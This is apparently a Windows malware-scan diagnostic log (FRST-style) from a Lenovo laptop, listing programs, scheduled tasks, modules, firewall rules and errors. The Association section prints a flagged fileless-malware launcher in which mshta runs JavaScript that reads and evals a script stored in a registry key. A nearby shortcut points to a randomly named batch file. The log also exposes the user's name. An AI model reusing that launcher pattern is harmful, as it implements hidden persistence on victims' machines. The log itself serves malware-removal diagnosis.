RingCentral Meetings (HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\RingCentralMeetings) (Version: 4.1 - Zoom Video Communications, Inc. and RingCentral Inc.)
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: - Lenovo)
Skype for Business Basic 2016 - en-us (HKLM\...\SkypeforBusinessEntryRetail - en-us) (Version: 16.0.6965.2053 - Microsoft Corporation)
Wondershare TunesGo(Version 7.3.10) (HKLM-x32\...\{ADBA24FE-D6F6-4B21-97F3-D58A327422E4}_is1) (Version: 7.3.10 - Wondershare)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-4252830516-2523568588-2152128588-1002_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Jennifer JonesSantos\AppData\Local\Google\Update\\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-4252830516-2523568588-2152128588-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Jennifer JonesSantos\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-4252830516-2523568588-2152128588-1002_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Jennifer JonesSantos\AppData\Local\Google\Update\\psuser_64.dll (Google Inc.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0CE3CF69-D9B0-457C-AA84-BB5D9BC1F748} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4252830516-2523568588-2152128588-1002UA => C:\Users\Jennifer JonesSantos\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-19] (Google Inc.)
Task: {16AD84BE-B9B7-437C-B9E0-071B120B2F5E} - System32\Tasks\PDVDServ12 Task => C:\Program Files (x86)\Lenovo\PowerDVD12\PDVD12Serv.exe [2015-05-20] (CyberLink Corp.)
Task: {255C9DC6-1A3F-437B-AE0A-1ED47B00F916} - System32\Tasks\Intel\Intel Telemetry 2 (x86) => C:\Program Files (x86)\Intel\Telemetry 2.0\lrio.exe [2015-06-05] (Intel Corporation)
Task: {2E5DFAE6-2710-4BFC-8ED8-C6FE58B63EE4} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_TVSUUpdateTask => reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32
Task: {323C8865-E72E-44C9-BDD2-185DDB8CC490} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-05-26] (Microsoft Corporation)
Task: {393880B4-FC5F-484A-8924-D2C09C85DB78} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-05-19] (Google Inc.)
Task: {45EDC8DD-0AAC-430B-AD44-F697E52F440D} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2016-04-20] (Lenovo)
Task: {69035A7D-6662-4114-A7E5-483AB46011BC} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2016-03-17] (Intel Corporation)
Task: {6B1472EE-F9E4-4A63-B449-4D74B585DFD8} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)
Task: {6C4E2754-7B6E-4861-B744-C30C544C8A6A} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2016-05-26] (Microsoft Corporation)
Task: {781BCD44-D9B0-4D58-B47B-4FD185FB3276} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => Sc.exe control iMControllerService 128
Task: {89F351FF-26AB-4C1E-BEEF-CCCA06984F6E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4252830516-2523568588-2152128588-1002Core => C:\Users\Jennifer JonesSantos\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-19] (Google Inc.)
Task: {90D119F3-2A13-46C0-AB18-5C47140F0C29} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\\SymErr.exe [2016-02-10] (Symantec Corporation)
Task: {97E588B7-BECD-43F8-B5CE-97903008CEC7} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\\SymErr.exe [2016-02-10] (Symantec Corporation)
Task: {985431B3-2136-4E2A-B817-C6B4C16E6827} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\\SymErr.exe [2016-02-10] (Symantec Corporation)
Task: {9CBCDCE1-6761-4C6E-AD0A-33513EA9D991} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-04-22] (Adobe Systems Incorporated)
Task: {A40ED42C-03E8-4D8F-9C98-C14C521555C6} - System32\Tasks\Lenovo\REACHit Agent Update => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2016-05-18] (Lenovo)
Task: {AA6CBAFC-206A-439A-9C27-D2679807091F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-05-19] (Google Inc.)
Task: {ACC87336-CA24-46D9-B4BC-2E43349213AF} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-05-26] (Microsoft Corporation)
Task: {BA6B09C7-BD28-47DB-A6C3-F5A3DA5AAD34} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe [2016-02-26] (Symantec Corporation)
Task: {BD9C018D-6F35-40C5-81CE-C963B1C42D29} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-04-20] (Lenovo)
Task: {DCF9CE4A-3882-4A9C-B8D2-27BD918F96B3} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-04-20] ()
Task: {DF53D76F-E6FE-432F-9D87-F114D1C39DBF} - System32\Tasks\Lenovo\REACHit Agent Startup => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2016-05-18] (Lenovo)
Task: {EFFFB79B-892B-4D51-8676-94A58141CF65} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\\WSCStub.exe [2016-02-26] (Symantec Corporation)
Task: {FD252007-74EF-4A88-A9C9-E04F3D6525DA} - System32\Tasks\USER_ESRV_SVC_WILLAMETTE => Wscript.exe //B //NoLogo "C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\task.vbs"
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4252830516-2523568588-2152128588-1002Core.job => C:\Users\Jennifer JonesSantos\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4252830516-2523568588-2152128588-1002UA.job => C:\Users\Jennifer JonesSantos\AppData\Local\Google\Update\GoogleUpdate.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
Shortcut: C:\Users\Jennifer JonesSantos\AppData\Local\49b833e\8b9e42a.lnk -> C:\Users\Jennifer JonesSantos\AppData\Local\49b833e\df89b89.bat ()
==================== Loaded Modules (Whitelisted) ==============
2015-10-30 03:17 - 2015-10-30 03:17 - 00028672 _____ () C:\Windows\SYSTEM32\efsext.dll
2015-10-30 03:18 - 2015-10-30 03:18 - 00185856 _____ () C:\Windows\SYSTEM32\ism32k.dll
2016-02-17 00:58 - 2015-11-29 11:15 - 00116344 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-09-15 05:58 - 2015-09-15 05:58 - 00176640 _____ () C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
2016-02-17 00:52 - 2016-02-17 00:52 - 00024312 _____ () C:\Program Files (x86)\Lenovo\LenovoPortal\LenovoPortalService.exe
2016-04-22 01:07 - 2016-04-22 01:07 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-04-22 01:07 - 2016-04-22 01:07 - 01337144 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-03-09 20:43 - 2016-03-09 20:43 - 00118424 _____ () C:\Program Files (x86)\Intel\Intel® RealSense Application Recommender\SUR\SurSvc.exe
2016-02-17 00:52 - 2016-02-17 00:52 - 00226216 _____ () C:\Program Files\update\UpdateAgent.exe
2016-05-19 23:18 - 2016-03-29 06:20 - 02656952 _____ () C:\Windows\system32\CoreUIComponents.dll
2016-05-19 23:18 - 2016-03-29 06:20 - 02656952 _____ () C:\Windows\System32\CoreUIComponents.dll
2016-05-19 21:04 - 2016-05-19 21:04 - 00959168 _____ () C:\Users\Jennifer JonesSantos\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
2016-05-19 21:20 - 2016-05-26 05:13 - 08919752 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2016-05-19 23:16 - 2015-12-07 00:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-05-19 23:18 - 2016-04-23 00:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-06-14 14:12 - 2016-05-27 23:59 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-06-14 14:12 - 2016-05-27 23:53 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-06-14 14:12 - 2016-05-27 23:54 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-06-14 14:12 - 2016-05-27 23:56 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-23 18:44 - 2015-07-23 18:44 - 00145024 _____ () C:\Program Files (x86)\Intel\Intel RealSense Training F200\Intel RealSense F200 Tray\Intel RealSense F200 Tray.exe
2016-05-29 11:25 - 2016-03-09 20:43 - 00460952 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv.exe
2016-05-29 11:25 - 2016-03-09 20:43 - 00709272 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_modeler.dll
2016-05-29 11:25 - 2016-03-09 20:43 - 00188568 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\foreground_window_input.dll
2016-05-29 11:25 - 2016-03-09 20:43 - 00416408 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe
2016-05-29 11:25 - 2016-03-09 20:43 - 00130712 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_process_input.dll
2016-05-29 11:25 - 2016-03-09 20:43 - 00025752 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_system_power_state_input.dll
2016-05-29 11:25 - 2016-03-09 20:43 - 00059544 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_quality_and_reliability_input.dll
2016-05-29 11:25 - 2016-03-09 20:43 - 00194712 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\acpi_battery_input.dll
2016-05-29 11:25 - 2016-03-09 20:43 - 00159896 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\sema_thermal_input.dll
2016-05-29 11:25 - 2016-03-09 20:43 - 00158360 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\wifi_input.dll
2016-05-29 11:25 - 2016-03-09 20:43 - 00050840 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\devices_use_input.dll
2016-05-29 11:25 - 2016-03-09 20:43 - 00032920 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_disktrace_input.dll
2016-05-19 21:41 - 2016-05-19 21:41 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-06-08 19:38 - 2016-06-03 21:01 - 02334360 _____ () C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.84\libglesv2.dll
2016-06-08 19:38 - 2016-06-03 21:01 - 00105112 _____ () C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.84\libegl.dll
2016-06-08 19:38 - 2016-06-03 21:01 - 31491736 _____ () C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.84\PepperFlash\pepflashplayer.dll
2016-05-23 17:37 - 2016-04-06 08:27 - 00161736 _____ () C:\ProgramData\Lenovo\iMController\Plugins\LenovoAudioPlugin\x86\QualityStatsRevInterop.dll
2016-05-19 21:04 - 2016-05-19 21:04 - 00679624 _____ () C:\Users\Jennifer JonesSantos\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\ClientTelemetry.dll
2016-06-16 15:58 - 2016-06-16 15:58 - 00098816 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32api.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00110080 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\pywintypes27.dll
2016-06-16 15:58 - 2016-06-16 15:58 - 00364544 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\pythoncom27.dll
2016-06-16 15:58 - 2016-06-16 15:58 - 00320512 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32com.shell.shell.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00776704 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\_hashlib.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 01176576 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\wx._core_.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00806400 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\wx._gdi_.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00816128 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\wx._windows_.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 01067008 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\wx._controls_.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00733184 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\wx._misc_.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00682496 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\pysqlite2._sqlite.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00088064 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\_ctypes.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00119808 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32file.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00108544 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32security.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00007168 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\hashobjs_ext.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00017920 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\thumbnails_ext.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00088064 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\usb_ext.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00012288 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\common.time34.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00018432 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32event.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00167936 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32gui.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00046080 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\_socket.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 01208320 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\_ssl.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00128512 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\_elementtree.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00127488 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\pyexpat.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00038912 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32inet.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00036864 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\_psutil_windows.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00525208 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\windows._lib_cacheinvalidation.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00011264 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32crypt.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00077312 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\wx._html2.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00027136 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\_multiprocessing.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00020480 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\_yappi.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00035840 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32process.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00686080 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\unicodedata.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00078848 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\wx._animate.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00123392 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\wx._wizard.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00024064 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32pipe.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00010240 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\select.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00025600 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32pdh.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00017408 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32profile.pyd
2016-06-16 15:58 - 2016-06-16 15:58 - 00022528 ____R () C:\Users\Jennifer JonesSantos\AppData\Local\Temp\_MEI15242\win32ts.pyd
2016-04-08 18:35 - 2016-04-08 18:35 - 03481600 _____ () C:\Users\Jennifer JonesSantos\AppData\Local\Programs\Google\Google Photos Backup\gpuploader_i18n.dll
2016-05-19 21:18 - 2016-05-19 21:19 - 01754296 _____ () C:\Program Files (x86)\Microsoft Office\root\Office16\tmpod.dll
2016-05-19 21:18 - 2016-05-25 08:24 - 00038080 _____ () C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconvpxy.dll
2009-12-04 20:59 - 2009-12-04 20:59 - 00619816 _____ () C:\Program Files (x86)\Lenovo\Power2Go\CLMediaLibrary.dll
2009-12-04 21:04 - 2009-12-04 21:04 - 00013096 _____ () C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvcPS.dll
2011-11-03 15:48 - 2011-11-03 15:48 - 00056320 _____ () C:\Program Files (x86)\Lenovo\Lenovo Silver Silk Wireless Keyboard\skfunc.dll
2016-05-19 21:41 - 2016-05-19 21:41 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-05-19 21:41 - 2016-05-19 21:41 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\Software\Classes\54bbdab: "C:\Windows\system32\mshta.exe" "javascript:S74Lev="qiD";y7r=new ActiveXObject("WScript.Shell");demW23qid="yHhBLLP";uqt0l=y7r.RegRead("HKCU\\software\\cwunviq\\kdak");SyH0lIUr="bJnE";eval(uqt0l);Jqlb9VrL="13w4uM";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\...\sharepoint.com -> hxxps://j2ssinc-files.sharepoint.com
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-10-30 03:24 - 2015-10-30 03:21 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-4252830516-2523568588-2152128588-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Jennifer JonesSantos\Pictures\JJ and boys.jpg
DNS Servers: -
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{D4BBBFBC-DAE0-410F-833B-0B8B207B9C9D}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoPortal\Lenovo.Portal.exe
FirewallRules: [{42968895-C16B-45F0-B3F0-9105DDDA3D68}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{7A14CBED-C522-4415-8ED7-55A29D61E39F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{DCD8C2F2-B20C-4AB4-BFCD-2DE83DB9046B}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{92D76664-00A7-4360-BEEF-54350CA2EF03}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3C5059BA-2FDB-403E-AC28-CBEE4ABCD84C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{A936A961-A3E6-4622-9F81-8E95EDECA684}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{20303540-0A06-4803-BCE2-DACB1E78459A}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{0A6A1FC4-061A-404A-B5A7-50257C7B8EE6}] => (Allow) D:\pcmover.exe
FirewallRules: [{E19A5243-4C11-40E0-8DC4-ED5EA8E96CAD}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{FC39CD9A-68A2-40C3-A0F0-AF3AE876C853}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{A07D4F25-8DF6-42D6-892F-7D94C6F8EF18}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{6BA28414-2690-4F6F-8F1B-BF1E65FD0DF5}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{66F75A27-EB93-4D92-8CFD-8E8FDD39A6FB}] => (Allow) D:\iTunes.exe
FirewallRules: [{B9F9C315-2BE4-4D98-B13C-D2E764184517}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Restore Points =========================
02-06-2016 12:48:58 Installed Adobe Acrobat DC.
03-06-2016 22:03:39 Installed iTunes
11-06-2016 10:09:03 Scheduled Checkpoint
14-06-2016 14:13:38 Windows Update
16-06-2016 15:56:48 Norton_Power_Eraser_20160616155647888
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
Error: (06/16/2016 03:58:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: WsAppService.exe, version:, time stamp: 0x56fce241
Faulting module name: KERNELBASE.dll, version: 6.2.10586.306, time stamp: 0x571af331
Exception code: 0xe053534f
Fault offset: 0x0000000000071f28
Faulting process id: 0x%9
Faulting application start time: 0xWsAppService.exe0
Faulting application path: WsAppService.exe1
Faulting module path: WsAppService.exe2
Report Id: WsAppService.exe3
Faulting package full name: WsAppService.exe4
Faulting package-relative application ID: WsAppService.exe5
Error: (06/16/2016 03:56:49 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.
Error: (06/16/2016 06:55:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: WsAppService.exe, version:, time stamp: 0x56fce241
Faulting module name: KERNELBASE.dll, version: 6.2.10586.306, time stamp: 0x571af331
Exception code: 0xe053534f
Fault offset: 0x0000000000071f28
Faulting process id: 0x%9
Faulting application start time: 0xWsAppService.exe0
Faulting application path: WsAppService.exe1
Faulting module path: WsAppService.exe2
Report Id: WsAppService.exe3
Faulting package full name: WsAppService.exe4
Faulting package-relative application ID: WsAppService.exe5
Error: (06/14/2016 02:13:39 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.
Error: (06/13/2016 02:54:52 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
Error: (06/13/2016 11:22:21 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: AcroTray.exe, version: 15.6.30174.56902, time stamp: 0x5747083b
Faulting module name: combase.dll, version: 10.0.10586.103, time stamp: 0x56a84cbb
Exception code: 0xc000041d
Fault offset: 0x00085d3c
Faulting process id: 0xc2a8
Faulting application start time: 0xAcroTray.exe0
Faulting application path: AcroTray.exe1
Faulting module path: AcroTray.exe2
Report Id: AcroTray.exe3
Faulting package full name: AcroTray.exe4
Faulting package-relative application ID: AcroTray.exe5
Error: (06/13/2016 11:22:19 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: AcroTray.exe, version: 15.6.30174.56902, time stamp: 0x5747083b
Faulting module name: combase.dll, version: 10.0.10586.103, time stamp: 0x56a84cbb
Exception code: 0xc0000005
Fault offset: 0x00085d3c
Faulting process id: 0xc2a8
Faulting application start time: 0xAcroTray.exe0
Faulting application path: AcroTray.exe1
Faulting module path: AcroTray.exe2
Report Id: AcroTray.exe3
Faulting package full name: AcroTray.exe4
Faulting package-relative application ID: AcroTray.exe5
Error: (06/13/2016 10:51:36 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: AcroTray.exe, version: 15.6.30174.56902, time stamp: 0x5747083b
Faulting module name: combase.dll, version: 10.0.10586.103, time stamp: 0x56a84cbb
Exception code: 0xc0000005
Fault offset: 0x00085d3c
Faulting process id: 0x4d50
Faulting application start time: 0xAcroTray.exe0
Faulting application path: AcroTray.exe1
Faulting module path: AcroTray.exe2
Report Id: AcroTray.exe3
